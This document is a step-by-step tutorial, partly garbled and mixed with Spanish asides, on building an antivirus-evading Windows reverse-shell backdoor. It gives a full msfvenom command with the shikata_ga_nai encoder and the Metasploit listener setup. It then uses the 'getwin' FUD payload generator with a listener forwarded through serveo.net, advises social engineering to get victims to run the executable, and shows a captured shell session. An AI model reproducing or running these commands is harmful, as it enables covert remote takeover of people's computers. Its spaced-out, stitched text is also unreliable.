How to Create a Nearly

Undetectable Backdoor using

MSFvenom in Kali Linux
A backdoor is used to bypass security mechanisms, often secretly and mostly undetectably.
Using MSFvenom, the combination of msfpayload and msfencode, it's possible to create a
backdoor that connects back to the attacker by using reverse shell TCP. In order to develop
a backdoor, you need to change the signature of your malware to evade any antivirus
software. Complete this project on a pair of computers that you have permission to access,
and in the process, you'll learn more about computer security and how this kind of backdoor
works.

Steps
1. Start up Kali and fire up the Terminal console.

2. Type i fc onfi g to display the interface and check your IP address.

3. Type m s f v e n o m - l e n c o d e r s to show the list of encoders.

You will use x 8 6 / s h i k a t a _ g a _ n a i as the encoder.
4. Type "msfvenom -a x86 --platform windows -p
windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b
"\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
 -a x86 --platform windows designates architecture to use.
 -p windows/shell/reverse_tcp designates the payloads to
embed.
 LHOST designates the listener IP address.
 LPORT designates the listener port.
 -b "\x00" designates to avoid bad character (null bytes).
 -e x86/shikata_ga_nai designates the encoders name.
 -f exe > helloWorld.exe designates format output. “acá pueden
generar archivos msi, otros executables”
5. Type m s f c o n s o l e to activate the Metasploit.
 Now you have generated your backdoor. When the victim clicks on
helloWorld.exe, the shell payload that is embedded will be activated and
make a connection back to your system. In order to receive the
 connection, you have to open the multi-handler in Metasploit and set the
payloads.
6. Type u s e e x p l o i t / m u l t i / h a n d l e r
7. Type s e t p a y l o a d W i n d o w s / S h e l l / r e v e r s e _ t c p
8. Type s h o w o p t i o n s
9. Type s e t L H O S T 1 9 2 . 1 6 8 . 4 8 . 1 2 9 “ l a I P l o c a l d e k a l y ”
10. Type s e t L P O R T 4 4 4 4 e l d e s e a d o
11. Type r u n y e s p e r e a q u e l a v i c t i m a s e c o n e c t e

Probar con Windows y verificar como lo detectarlos antivirus

Probar lo siguiente

Windows shell is what, every hacker loves. There are various Windows payloads are designed to
bypass Windows OS security mechanism. According to ethical hacking researcher of
international institute of cyber security these payloads are well coded to get sessions of Windows
OS. There are many different ways of getting reverse shell. Today we will show getwin tool used
to create Win32 payload and listener.

Payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do Not
Upload the payload generated on virustotal.com.

 For testing purposes, On attacker side we will use Kali Linux 2018.4 amd64 and on the Victim
side we will use Windows 10 1809.
 Open terminal type git clone https://github.com/thelinuxchoice/getwin.git
 Then type cd getwin & type chmod u+x getwin.sh

root@kali:/home/iicybersecurity/Downloads# git clone https://githu

b.com/thelinuxchoice/getwin.git

Cloning into 'getwin'…

remote: Enumerating objects: 46, done.

remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46

Unpacking objects: 100% (46/46), done.

root@kali:/home/iicybersecurity/Downloads# cd getwin/

root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwi

n.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls

getwin.sh icon LICENSE README.md

 Type ./getwin.sh

root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh

_______ _ _ _ _
(_______) _ (_)(_)(_)(_)
_ ___ _____ _| |_ _ _ _ _ ____
| | (_ || ___ |(_ _)| || || || || _ \
| |___) || ____| | |_ | || || || || | | |
\_____/ |_____) \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.

.:.: Coded by:@linux_choice :.:.

:: Warning: Attacking targets without ::

:: prior mutual consent is illegal! ::
 After the tool has started, press enter to set default port. Then enter payload name(test01)
and select the icon.

[*] Choose a Port (Default: 4098 ):

[*] Payload name (Default: payload ): test01

[] Put ICON path (Default: icon/messenger.ico ): [] Compiling…

[] Saved: test01.exe [!] Please, don't upload to virustotal.com !

[] Starting server…

[*] Send the first link above to target + /test01.exe:

Forwarding HTTP traffic from https://ludius.serveo.net

Forwarding TCP connections from serveo.net:2119

[*] Waiting connection…

listening on [any] 1547 …

 As you can see listener connection has started. Now you can use any social engineering trick
to execute the payload in victim computer.
 For testing we will use Windows 10 1809 with Windows Defender enabled.

 So now we will execute the payload in Windows 10 OS.

 After creating the payload (test01.exe). Execute the payload (test01.exe). Simply double click
the executable.
 As you double click on the payload (test01.exe). A session will be created between victim and
the target machine and you will get windows shell.
 Tools like this are the part of ethical hacking courses offered by International Institute of
Cyber Security
Do Not Upload the payload generated on virustotal.com

[*] Waiting connection…

listening on [any] 4342 …

connect to [127.0.0.1] from localhost [127.0.0.1] 43878

TCP connection from 27.4.174.190 on port 3352

Microsoft Windows [Version 10.0.17758.1]

(c) 2018 Microsoft Corporation. All rights reserved.

E:>C:

C:

C:>ipconfig
 ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%

13

IPv4 Address. . . . . . . . . . . : 192.168.1.5

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : fe80::1%13

192.168.1.1

C:>getmac

getmac

Physical Address Transport Name

=================== =============================================
=============

##-##-##-E8-##-## \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB
31D7FC}

(For security reasons we have hide the MAC address)

 Now attacker can change or view any file of target’s Windows 10 computer.